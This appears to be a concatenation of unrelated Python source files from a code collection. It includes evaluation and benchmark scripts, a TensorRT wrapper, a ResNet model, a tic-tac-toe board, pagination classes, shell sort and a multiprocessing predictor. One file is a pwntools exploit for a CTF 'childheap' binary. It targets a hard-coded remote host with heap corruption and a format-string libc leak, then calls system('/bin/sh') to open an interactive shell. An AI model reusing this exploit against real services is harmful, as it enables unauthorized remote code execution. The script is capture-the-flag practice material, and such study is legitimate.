acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "mAP" in result_dict:
result["mAP"] = 100.0 * result_dict["mAP"]
acc_str += ", mAP={:.3f}%".format(result["mAP"])
# add the result to the result dict
final_results[name] = result
# to stdout
print(
"{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str, len(result_list), buckets_str
)
)
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# --count applies to accuracy mode only and can be used to limit the number of images
# for testing. For perf model we always limit count to 200.
count_override = False
count = args.count
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(
data_path=os.path.abspath(args.dataset_path),
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
cache_dir=args.cache_dir,
count=count,
**kwargs,
)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
img, _ = ds.get_samples([0])
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
scenario = "model evaluation"
log.info("starting {}".format(scenario))
runner = RunnerBase(
model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize
)
result_dict = {"good": 0, "total": 0}
runner.start_run(result_dict, args.accuracy)
with tqdm.tqdm(total=count, unit="image") as pbar:
for chunk in chunked(range(count), 1000):
ds.load_query_samples(chunk)
runner.enqueue(ds.image_list_inmemory, pbar)
ds.unload_query_samples(None)
last_timeing = runner.result_timing
post_proc.finalize(result_dict, ds, output_dir=args.output)
add_results(
final_results,
scenario,
count,
result_dict,
last_timeing,
time.time() - ds.last_loaded,
args.accuracy,
)
runner.finish()
#
# write final results
#
file_name = os.path.basename(args.model).split(".onnx")[0]
if args.output:
with open(f"{file_name}_n={count}.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
py | b415a4c285235b03b60258d29f8b98205c14d526 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions or classes shared between BERT benchmarks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
# pylint: disable=g-bad-import-order
import numpy as np
from absl import flags
import tensorflow.compat.v2 as tf
# pylint: enable=g-bad-import-order
from official.utils.flags import core as flags_core
from official.utils.testing.perfzero_benchmark import PerfZeroBenchmark
FLAGS = flags.FLAGS
class BenchmarkTimerCallback(tf.keras.callbacks.Callback):
"""Callback that records time it takes to run each batch."""
def __init__(self, num_batches_to_skip=10):
super(BenchmarkTimerCallback, self).__init__()
self.batch_start_times = {}
self.batch_stop_times = {}
def on_batch_begin(self, batch, logs=None):
self.batch_start_times[batch] = time.time()
def on_batch_end(self, batch, logs=None):
self.batch_stop_times[batch] = time.time()
def get_examples_per_sec(self, batch_size, num_batches_to_skip=1):
batch_durations = []
for batch in self.batch_start_times:
if batch in self.batch_stop_times and batch >= num_batches_to_skip:
batch_durations.append(self.batch_stop_times[batch] -
self.batch_start_times[batch])
return batch_size / np.mean(batch_durations)
def get_startup_time(self, program_start_time):
return self.batch_start_times[0] - program_start_time
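# Usage sketch (model and dataset are assumptions for illustration): attach the
# callback to a Keras fit() call, then read throughput afterwards.
#
#   timer = BenchmarkTimerCallback()
#   model.fit(dataset, epochs=1, callbacks=[timer])
#   examples_per_sec = timer.get_examples_per_sec(batch_size=32)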
class BertBenchmarkBase(PerfZeroBenchmark):
"""Base class to hold methods common to test classes."""
local_flags = None
def __init__(self, output_dir=None):
super(BertBenchmarkBase, self).__init__(output_dir=output_dir)
self.num_gpus = 8
self.timer_callback = None
def _setup(self):
"""Sets up and resets flags before each test."""
super(BertBenchmarkBase, self)._setup()
self.timer_callback = BenchmarkTimerCallback()
def _report_benchmark(self, stats, wall_time_sec, min_accuracy, max_accuracy):
"""Report benchmark results by writing to local protobuf file.
Args:
stats: dict returned from BERT models with known entries.
      wall_time_sec: the duration of the benchmark execution in seconds
min_accuracy: Minimum classification accuracy constraint to verify
correctness of the model.
max_accuracy: Maximum classification accuracy constraint to verify
correctness of the model.
"""
metrics = [{
'name': 'training_loss',
'value': stats['train_loss'],
}]
if self.timer_callback:
metrics.append({
'name':
'exp_per_second',
'value':
self.timer_callback.get_examples_per_sec(FLAGS.train_batch_size *
FLAGS.steps_per_loop)
})
else:
metrics.append({
'name': 'exp_per_second',
'value': 0.0,
})
if self.timer_callback and 'start_time_sec' in stats:
metrics.append({
'name': 'startup_time',
'value': self.timer_callback.get_startup_time(stats['start_time_sec'])
})
if 'eval_metrics' in stats:
metrics.append({
'name': 'eval_accuracy',
'value': stats['eval_metrics'],
'min_value': min_accuracy,
'max_value': max_accuracy,
})
flags_str = flags_core.get_nondefault_flags_as_str()
self.report_benchmark(
iters=stats['total_training_steps'],
wall_time=wall_time_sec,
metrics=metrics,
extras={'flags': flags_str})
|
py | b415a8dfbe481fad977efabe5588a995cdc725d7 | from pwn import *
r = remote("13.124.131.103", 31337)
#r = process("./childheap")
def allocate(size, data):
r.send("1\n")
print r.recvuntil("Input size: ")
r.send(str(size)+"\n")
print r.recvuntil("Input data: ")
r.send(data)
print r.recvuntil("> ")
def free():
r.send("2\n")
print r.recvuntil("> ")
def secret(code):
r.send(str(0x31337) + "\n")
print r.recvuntil("code: ")
r.send(str(code) + "\n")
print r.recvuntil("> ")
raw_input("$")
print r.recvuntil("> ")
r.send("1234\n")
allocate(4095, "asdf")
free()
r.send("3\n")
print r.recvuntil("(y/n)? ")
r.send("n\n")
print r.recvuntil("new name: ")
r.send("asdf\n")
print r.recvuntil("new one (y/n)? ")
r.send("y\n")
print r.recvuntil("> ")
free()
r.send("3\n")
print r.recvuntil("(y/n)? ")
r.send("n\n")
print r.recvuntil("name: ")
r.send("a"*8 + p64(0x6020b0) + "\n")
print r.recvuntil("new one (y/n)? ")
r.send("y\n")
print r.recvuntil("> ")
allocate(4095, "asdf")
r.send("3\n")
print r.recvuntil("(y/n)? ")
r.send("n\n")
print r.recvuntil("name: ")
r.send("\x00"*8 + p64(0x6020a8)*2 + "\n")
print r.recvuntil("new one (y/n)? ")
r.send("y\n")
free()
secret(1041)
allocate(1023, "\x00"*8 + p64(0x602060-2))
r.send("3\n")
print r.recvuntil("(y/n)? ")
r.send("n\n")
print r.recvuntil("name: ")
payload = p64(0x4007c6)
payload += p64(0x400756)
payload += p64(0x4007e6)
r.send(payload + "\n")
print r.recvuntil("new one (y/n)? ")
r.send("y\n")
print r.recvuntil("> ")
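 ")">
# The next lines appear to leak a libc pointer: "%7$s" is a format-string read
# and 0x602038 looks like a GOT entry, so the 6 bytes received are interpreted
# as the runtime address of a libc function (this reading of the hard-coded
# offsets is an assumption; adjust for the actual target binary).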
r.send("%7$s.aaa" + p64(0x602038))
recved = r.recv(6)
read_libc = u64(recved + "\x00\x00")
#libc_base = read_libc - 0xf7220
#system = libc_base + 0x45390
libc_base = read_libc - 0xf69a0
system = libc_base + 0x45380
print "read_libc: " +hex(read_libc)
r.send("aa\n") # modify
print r.recvuntil("(y/n)? ")
r.send("n\n")
print r.recvuntil("name: ")
print r.recvuntil("new one (y/n)? ")
r.send("n\n")
print r.recvuntil("> ")
r.send("aa\n")
print r.recvuntil("(y/n)? ")
r.send("n\n")
print r.recvuntil("name: ")
payload = "A"*2
payload += p64(0x4007c6)
payload += p64(system)
payload += p64(0x4007e6)
r.send(payload + "\n")
print r.recvuntil("new one (y/n)? ")
r.send("y\n")
print r.recvuntil("> ")
r.send("/bin/sh\x00\n")
r.interactive()
|
py | b415abcd7bf79040053903b99af3e078ed2cb586 | # Copyright (c) OpenMMLab. All rights reserved.
import warnings
from typing import Union
import onnx
import tensorrt as trt
import torch
from .preprocess import preprocess_onnx
def onnx2trt(onnx_model: Union[str, onnx.ModelProto],
opt_shape_dict: dict,
log_level: trt.ILogger.Severity = trt.Logger.ERROR,
fp16_mode: bool = False,
max_workspace_size: int = 0,
device_id: int = 0) -> trt.ICudaEngine:
"""Convert onnx model to tensorrt engine.
Arguments:
onnx_model (str or onnx.ModelProto): the onnx model to convert from
opt_shape_dict (dict): the min/opt/max shape of each input
log_level (TensorRT log level): the log level of TensorRT
fp16_mode (bool): enable fp16 mode
        max_workspace_size (int): set max workspace size of TensorRT engine;
            some tactics and layers need a large workspace.
        device_id (int): choose the device on which to create the engine.
Returns:
tensorrt.ICudaEngine: the TensorRT engine created from onnx_model
Example:
>>> engine = onnx2trt(
>>> "onnx_model.onnx",
>>> {'input': [[1, 3, 160, 160],
>>> [1, 3, 320, 320],
>>> [1, 3, 640, 640]]},
>>> log_level=trt.Logger.WARNING,
>>> fp16_mode=True,
>>> max_workspace_size=1 << 30,
>>> device_id=0)
"""
# Following strings of text style are from colorama package
bright_style, reset_style = '\x1b[1m', '\x1b[0m'
red_text, blue_text = '\x1b[31m', '\x1b[34m'
white_background = '\x1b[107m'
msg = white_background + bright_style + red_text
msg += 'DeprecationWarning: This function will be deprecated in future. '
msg += blue_text + 'Welcome to use the unified model deployment toolbox '
msg += 'MMDeploy: https://github.com/open-mmlab/mmdeploy'
msg += reset_style
warnings.warn(msg)
device = torch.device(f'cuda:{device_id}')
# create builder and network
logger = trt.Logger(log_level)
builder = trt.Builder(logger)
EXPLICIT_BATCH = 1 << (int)(
trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
network = builder.create_network(EXPLICIT_BATCH)
# parse onnx
parser = trt.OnnxParser(network, logger)
if isinstance(onnx_model, str):
onnx_model = onnx.load(onnx_model)
onnx_model = preprocess_onnx(onnx_model)
if not parser.parse(onnx_model.SerializeToString()):
error_msgs = ''
for error in range(parser.num_errors):
error_msgs += f'{parser.get_error(error)}\n'
raise RuntimeError(f'parse onnx failed:\n{error_msgs}')
# config builder
builder.max_workspace_size = max_workspace_size
config = builder.create_builder_config()
config.max_workspace_size = max_workspace_size
profile = builder.create_optimization_profile()
for input_name, param in opt_shape_dict.items():
min_shape = tuple(param[0][:])
opt_shape = tuple(param[1][:])
max_shape = tuple(param[2][:])
profile.set_shape(input_name, min_shape, opt_shape, max_shape)
config.add_optimization_profile(profile)
if fp16_mode:
builder.fp16_mode = fp16_mode
config.set_flag(trt.BuilderFlag.FP16)
# create engine
with torch.cuda.device(device):
engine = builder.build_engine(network, config)
return engine
def save_trt_engine(engine: trt.ICudaEngine, path: str) -> None:
"""Serialize TensorRT engine to disk.
Arguments:
engine (tensorrt.ICudaEngine): TensorRT engine to serialize
path (str): disk path to write the engine
"""
# Following strings of text style are from colorama package
bright_style, reset_style = '\x1b[1m', '\x1b[0m'
red_text, blue_text = '\x1b[31m', '\x1b[34m'
white_background = '\x1b[107m'
msg = white_background + bright_style + red_text
msg += 'DeprecationWarning: This function will be deprecated in future. '
msg += blue_text + 'Welcome to use the unified model deployment toolbox '
msg += 'MMDeploy: https://github.com/open-mmlab/mmdeploy'
msg += reset_style
warnings.warn(msg)
with open(path, mode='wb') as f:
f.write(bytearray(engine.serialize()))
def load_trt_engine(path: str) -> trt.ICudaEngine:
"""Deserialize TensorRT engine from disk.
Arguments:
path (str): disk path to read the engine
Returns:
tensorrt.ICudaEngine: the TensorRT engine loaded from disk
"""
# Following strings of text style are from colorama package
bright_style, reset_style = '\x1b[1m', '\x1b[0m'
red_text, blue_text = '\x1b[31m', '\x1b[34m'
white_background = '\x1b[107m'
msg = white_background + bright_style + red_text
msg += 'DeprecationWarning: This function will be deprecated in future. '
msg += blue_text + 'Welcome to use the unified model deployment toolbox '
msg += 'MMDeploy: https://github.com/open-mmlab/mmdeploy'
msg += reset_style
warnings.warn(msg)
with trt.Logger() as logger, trt.Runtime(logger) as runtime:
with open(path, mode='rb') as f:
engine_bytes = f.read()
engine = runtime.deserialize_cuda_engine(engine_bytes)
return engine
def torch_dtype_from_trt(dtype: trt.DataType) -> Union[torch.dtype, TypeError]:
"""Convert pytorch dtype to TensorRT dtype."""
if dtype == trt.bool:
return torch.bool
elif dtype == trt.int8:
return torch.int8
elif dtype == trt.int32:
return torch.int32
elif dtype == trt.float16:
return torch.float16
elif dtype == trt.float32:
return torch.float32
else:
raise TypeError('%s is not supported by torch' % dtype)
def torch_device_from_trt(
device: trt.TensorLocation) -> Union[torch.device, TypeError]:
"""Convert pytorch device to TensorRT device."""
if device == trt.TensorLocation.DEVICE:
return torch.device('cuda')
elif device == trt.TensorLocation.HOST:
return torch.device('cpu')
else:
return TypeError('%s is not supported by torch' % device)
class TRTWrapper(torch.nn.Module):
"""TensorRT engine Wrapper.
Arguments:
engine (tensorrt.ICudaEngine): TensorRT engine to wrap
input_names (list[str]): names of each inputs
output_names (list[str]): names of each outputs
Note:
        If the engine is converted from an onnx model, the input_names and
        output_names should be the same as in the onnx model.
"""
def __init__(self, engine, input_names=None, output_names=None):
# Following strings of text style are from colorama package
bright_style, reset_style = '\x1b[1m', '\x1b[0m'
red_text, blue_text = '\x1b[31m', '\x1b[34m'
white_background = '\x1b[107m'
msg = white_background + bright_style + red_text
msg += 'DeprecationWarning: This tool will be deprecated in future. '
msg += blue_text + \
'Welcome to use the unified model deployment toolbox '
msg += 'MMDeploy: https://github.com/open-mmlab/mmdeploy'
msg += reset_style
warnings.warn(msg)
super().__init__()
self.engine = engine
if isinstance(self.engine, str):
self.engine = load_trt_engine(engine)
if not isinstance(self.engine, trt.ICudaEngine):
raise TypeError('engine should be str or trt.ICudaEngine')
self._register_state_dict_hook(TRTWrapper._on_state_dict)
self.context = self.engine.create_execution_context()
# get input and output names from engine
if input_names is None or output_names is None:
names = [_ for _ in self.engine]
input_names = list(filter(self.engine.binding_is_input, names))
output_names = list(set(names) - set(input_names))
self.input_names = input_names
self.output_names = output_names
def _on_state_dict(self, state_dict, prefix, local_metadata):
state_dict[prefix + 'engine'] = bytearray(self.engine.serialize())
state_dict[prefix + 'input_names'] = self.input_names
state_dict[prefix + 'output_names'] = self.output_names
def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,
missing_keys, unexpected_keys, error_msgs):
engine_bytes = state_dict[prefix + 'engine']
with trt.Logger() as logger, trt.Runtime(logger) as runtime:
self.engine = runtime.deserialize_cuda_engine(engine_bytes)
self.context = self.engine.create_execution_context()
self.input_names = state_dict[prefix + 'input_names']
self.output_names = state_dict[prefix + 'output_names']
def forward(self, inputs):
"""
Arguments:
inputs (dict): dict of input name-tensors pair
Return:
dict: dict of output name-tensors pair
"""
assert self.input_names is not None
assert self.output_names is not None
bindings = [None] * (len(self.input_names) + len(self.output_names))
for input_name, input_tensor in inputs.items():
idx = self.engine.get_binding_index(input_name)
if input_tensor.dtype == torch.long:
input_tensor = input_tensor.int()
self.context.set_binding_shape(idx, tuple(input_tensor.shape))
bindings[idx] = input_tensor.contiguous().data_ptr()
# create output tensors
outputs = {}
for i, output_name in enumerate(self.output_names):
idx = self.engine.get_binding_index(output_name)
dtype = torch_dtype_from_trt(self.engine.get_binding_dtype(idx))
shape = tuple(self.context.get_binding_shape(idx))
device = torch_device_from_trt(self.engine.get_location(idx))
output = torch.empty(size=shape, dtype=dtype, device=device)
outputs[output_name] = output
bindings[idx] = output.data_ptr()
self.context.execute_async_v2(bindings,
torch.cuda.current_stream().cuda_stream)
return outputs
class TRTWraper(TRTWrapper):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
warnings.warn(
'TRTWraper will be deprecated in'
' future. Please use TRTWrapper instead', DeprecationWarning)
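# Usage sketch (added for illustration; not part of the original module). It
# assumes a serialized TensorRT engine already exists at the hypothetical path
# 'model.engine', that it was built from an ONNX model whose bindings are named
# 'input' and 'output', and that a CUDA device is available.
if __name__ == '__main__':
    trt_model = TRTWrapper('model.engine',
                           input_names=['input'],
                           output_names=['output'])
    dummy_input = torch.randn(1, 3, 224, 224, device='cuda')
    outputs = trt_model({'input': dummy_input})      # dict of name -> tensor
    print({name: tensor.shape for name, tensor in outputs.items()})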
|
py | b415ae77a5bfe8d36109a07ce7281f8f5dc16e1b | from src.exceptions import AlreadySelectedError
class Board:
def __init__(self):
self.turn = "O"
self._board = {
(1,1) : None,
(1,2) : None,
(1,3) : None,
(2,1) : None,
(2,2) : None,
(2,3) : None,
(3,1) : None,
(3,2) : None,
(3,3) : None,
}
self._win_combinaisons = [
((1,1), (1,2), (1,3)),
((2,1), (2,2), (2,3)),
((3,1), (3,2), (3,3)),
((1,1), (2,1), (3,1)),
((1,2), (2,2), (3,2)),
((1,3), (2,3), (3,3)),
((1,1), (2,2), (3,3)),
((1,3), (2,2), (3,1)),
]
def __getitem__(self, index):
        if index[0] > 3 or index[1] > 3 or index[0] < 1 or index[1] < 1:
            raise IndexError("index must be a (row, column) pair with values in 1..3")
return self._board[index]
def __setitem__(self, index, value):
        if index[0] > 3 or index[1] > 3 or index[0] < 1 or index[1] < 1:
            raise IndexError("index must be a (row, column) pair with values in 1..3")
        if value != "O" and value != "X":
            raise ValueError("value must be 'O' or 'X'")
        if self._board[index] is not None:
raise AlreadySelectedError("this case is already selected")
self._board[index] = value
self.__inverse_turns()
def __inverse_turns(self):
if self.turn == "O":
self.turn = "X"
elif self.turn == "X":
self.turn = "O"
def check_saturation(self):
        for value in self._board.values():
            if value is None:
return False
return True
def check_winer(self):
for combinaison in self._win_combinaisons:
value = self.check_combinaison(combinaison)
if value != False:
return value, combinaison
return False
def check_combinaison(self, combinaison):
if self._board[combinaison[0]] == None:
return False
else:
if self._board[combinaison[0]] != self._board[combinaison[1]]:
return False
else:
if self._board[combinaison[0]] != self._board[combinaison[2]]:
return False
else:
return self._board[combinaison[0]]
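# Usage sketch (added for illustration; not part of the original module). It
# assumes the src.exceptions package imported above is available. Coordinates
# are (row, column) pairs in 1..3, and the board flips self.turn between "O"
# and "X" automatically on every assignment.
if __name__ == "__main__":
    board = Board()
    board[(1, 1)] = "O"
    board[(2, 1)] = "X"
    board[(1, 2)] = "O"
    board[(2, 2)] = "X"
    board[(1, 3)] = "O"                  # completes the top row for "O"
    print(board.check_winer())           # ('O', ((1, 1), (1, 2), (1, 3)))
    print(board.check_saturation())      # False, empty squares remain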
|
py | b415ae914829dca93ccf21f9bfe3df265f33b6a4 | from rest_framework.pagination import LimitOffsetPagination, PageNumberPagination
class PostLimitOffsetPagination(LimitOffsetPagination):
default_limit = 2
max_limit = 4
class PostPageNumberPagination(PageNumberPagination):
page_size = 8
class CategoryPageNumberPagination(PageNumberPagination):
page_size = 10
|
py | b415af2ce7c38ffd5f4eb1365d33397eee37fac6 | import torch.nn as nn
import torch.nn.functional as F
def conv3x3(in_planes, out_planes, stride=1):
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=True)
def cfg(depth):
depth_lst = [18, 34, 50, 101, 152]
    assert (depth in depth_lst), "Error: ResNet depth should be one of 18, 34, 50, 101, 152"
cf_dict = {
'18': (BasicBlock, [2, 2, 2, 2]),
'34': (BasicBlock, [3, 4, 6, 3]),
'50': (Bottleneck, [3, 4, 6, 3]),
'101': (Bottleneck, [3, 4, 23, 3]),
'152': (Bottleneck, [3, 8, 36, 3]),
}
return cf_dict[str(depth)]
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(in_planes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion * planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=True),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=True)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=True)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=True)
self.bn3 = nn.BatchNorm2d(self.expansion*planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=True),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, depth, num_classes):
super(ResNet, self).__init__()
self.in_planes = 16
block, num_blocks = cfg(depth)
self.conv1 = conv3x3(3,16)
self.bn1 = nn.BatchNorm2d(16)
self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2)
self.linear = nn.Linear(64*block.expansion, num_classes)
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = F.avg_pool2d(out, 8)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
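# Usage sketch (added for illustration; not part of the original module). The
# stack above downsamples twice and then average-pools with a kernel of 8, so
# it expects 32x32 inputs such as CIFAR-10; depth must be one of 18/34/50/101/152.
if __name__ == '__main__':
    import torch
    model = ResNet(depth=18, num_classes=10)
    dummy = torch.randn(4, 3, 32, 32)    # a batch of 4 CIFAR-sized images
    logits = model(dummy)
    print(logits.shape)                  # torch.Size([4, 10])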
|
py | b415af72b0f62905214acaeedfed5355b64fa525 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import tempfile
import devtools_test_base
import pyauto_functional # Must be imported before pyauto
import pyauto
import pyauto_utils
class DevToolsInstrumentedObjectsCheck(devtools_test_base.DevToolsTestBase):
"""Test for checking that all instrumented objects are allocated by tcmalloc.
This test navigates the browser to a test page, then takes native memory
snapshot over remote debugging protocol and prints the number of objects
that were counted by the DevTools memory instrumentation and how many of
them have not been allocated by tcmalloc. Ideally the latter number should
be 0.
The test starts browser with HEAPPROFILE environment variable to enable
tcmalloc heap profiler which is required by the memory instrumentation to
check which of the instrumented objects have actually been allocated on the
heap.
The test uses Web Page Replay server as a proxy that allows to replay
the same state of the test pages and avoid heavy network traffic on the
real web sites. See webpagereplay.ReplayServer documentation to learn how
to record new page archives.
"""
def setUp(self):
# Make sure Chrome is started with tcmalloc heap profiler enabled. Dump
# profiles into a temporary directory that will be destroyed when the test
# completes.
self._tempdir = tempfile.mkdtemp(prefix='devtools-test')
os.environ['HEAPPROFILE'] = os.path.join(self._tempdir, 'heap-profile.')
super(DevToolsInstrumentedObjectsCheck, self).setUp()
def tearDown(self):
super(DevToolsInstrumentedObjectsCheck, self).tearDown()
del os.environ['HEAPPROFILE']
if self._tempdir:
pyauto_utils.RemovePath(self._tempdir)
def testNytimes(self):
self.RunTestWithUrl('http://www.nytimes.com/')
def testCnn(self):
self.RunTestWithUrl('http://www.cnn.com/')
def testGoogle(self):
self.RunTestWithUrl('http://www.google.com/')
def PrintTestResult(self, hostname, snapshot):
total = snapshot.GetProcessPrivateMemorySize()
counted_objects = snapshot.GetInstrumentedObjectsCount()
counted_unknown_objects = snapshot.GetNumberOfInstrumentedObjectsNotInHeap()
if not counted_objects or not counted_unknown_objects:
logging.info('No information about number of instrumented objects.')
return
logging.info('Got data for: %s, objects count = %d (unknown = %d) ' %
(hostname, counted_objects, counted_unknown_objects))
pyauto_utils.PrintPerfResult('DevTools Unknown Instrumented Objects',
hostname, counted_unknown_objects, 'objects')
if __name__ == '__main__':
pyauto_functional.Main()
|
py | b415af876b91290b0482a679dd9f34e5b12f5482 | # -*- coding: UTF-8 -*-
#
# Shell Sort Algorithm
# The All ▲lgorithms library for python
#
# Contributed by: Elias
# Github: @eliasbayona
#
def shell_sort(arr):
n = len(arr)
h = int(n/2)
while h > 0:
for i in range(h,n):
temp = arr[i]
j = i
            while j >= h and arr[j-h] > temp:
arr[j] = arr[j-h]
j -= h
arr[j] = temp
h = int(h/2)
return arr
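# Usage sketch (added for illustration): the gap starts at half the list length
# and halves each pass, finishing with a plain insertion sort at gap 1.
if __name__ == '__main__':
    data = [35, 33, 42, 10, 14, 19, 27, 44]
    print(shell_sort(data))  # [10, 14, 19, 27, 33, 35, 42, 44]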
|
py | b415af9eb13f8798d673ac878c64cdf51401b357 | IMAGES = [{
'accountId': 1234,
'blockDevices': [],
'createDate': '2013-12-05T21:53:03-06:00',
'globalIdentifier': '0B5DEAF4-643D-46CA-A695-CECBE8832C9D',
'id': 100,
'name': 'test_image',
'parentId': ''
}, {
'accountId': 1234,
'blockDevices': [],
'createDate': '2013-12-05T21:53:03-06:00',
'globalIdentifier': 'EB38414C-2AB3-47F3-BBBD-56A5F689620B',
'id': 101,
'name': 'test_image2',
'parentId': ''
}]
getObject = IMAGES[0]
getPublicImages = IMAGES
deleteObject = {}
editObject = True
setTags = True
createFromExternalSource = [{
'createDate': '2013-12-05T21:53:03-06:00',
'globalIdentifier': '0B5DEAF4-643D-46CA-A695-CECBE8832C9D',
'id': 100,
'name': 'test_image',
}]
|
py | b415b08c5d19e21b845c1974d7f68e34a46a2cd6 | # Copyright 2020 reinforced_scinet (https://github.com/hendrikpn/reinforced_scinet)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
from torch.multiprocessing import Process, Value
from datetime import datetime
import numpy as np
import sys
import warnings
import time
from config import Config
class PredictorProcess(Process):
def __init__(self, agent, observation_q, prediction_qs, env_id, predictor_id):
"""
Predictors gather observations from agents and make predictions.
Args:
agent (:class:`base_networks.DeepPS`): The deep PS model for RL.
observation_q (:class:`mp.Queue`): Shared memory queue with observations of agents of the same type.
prediction_qs (:obj:`list` of :class:`mp.Queue`): Shared memory queues containing predictions.
env_id (str): The identifier for the environment type.
predictor_id (int): The id of the trainer process.
"""
super(PredictorProcess, self).__init__()
self.agent = agent
self.observation_q = observation_q
self.prediction_qs = prediction_qs
self.env_id = env_id
self.id = predictor_id
#int: Signal for process exit.
self.exit_flag = Value('i', 0)
#torch.Tensor of float: Array of actions in one-hot encoding.
self.actions = torch.Tensor(np.eye(Config.NUM_ACTIONS)).to(Config.DEVICE)
def predict(self, observation_batch):
"""
Predict h-values with neural network model.
Forward pass through the network.
Args:
observation_batch (torch.Tensor): Tensor which represents the batched states of the environments.
Returns:
h_values (torch.Tensor): List of weights which define h-values in the PS framework.
"""
# Forward pass.
with torch.no_grad():
h_values = torch.empty(0, device=observation_batch.device)
for action in self.actions:
h_val_batch = self.agent.forward_no_selection(observation_batch, action.reshape(1, len(action)))
h_values = torch.cat((h_values, h_val_batch), dim=1)
return h_values
def run(self):
"""
Runs the process predictor.
(i) Gets observation data from prediction queue.
(ii) Send data to device.
(iii) Gathers predictions with shared model.
(iv) Distributes predictions to agents.
"""
print(f'Spawning predictor #{self.id} for type {self.env_id}')
sys.stdout.flush()
while not self.exit_flag.value:
# (i) Get observation data.
id_batch = torch.zeros(Config.PREDICTION_BATCH_SIZE, dtype=torch.int32)
observation_batch = torch.zeros((Config.PREDICTION_BATCH_SIZE, Config.INPUT_SIZE))
# "EOFError" on some clusters can be removed by mp.Event() or mp.set_sharing_strategy('file_system')
Id, observation = self.observation_q.get() # fix error with mp.set_sharing_strategy('file_system')
id_batch[0], observation_batch[0] = Id.item(), observation
size = 1
while size < Config.PREDICTION_BATCH_SIZE and not self.observation_q.empty():
Id, observation = self.observation_q.get()
id_batch[size], observation_batch[size] = Id.item(), observation
size += 1
# (ii) Resize data and Transfer to device.
id_batch = id_batch[:size]
observation_batch = observation_batch[:size].to(Config.DEVICE)
#(iii) Make prediction.
h_values = self.predict(observation_batch).to('cpu')
# (iv) Add to queue.
for index, i in enumerate(id_batch):
# "RuntimeError: received 0 items of ancdata" can be fixed with mp.set_sharing_strategy('file_system')
self.prediction_qs[i].put(h_values[index]) # fix error with mp.set_sharing_strategy('file_system')
print(f'Closed predictor #{self.id}')
sys.stdout.flush()
|
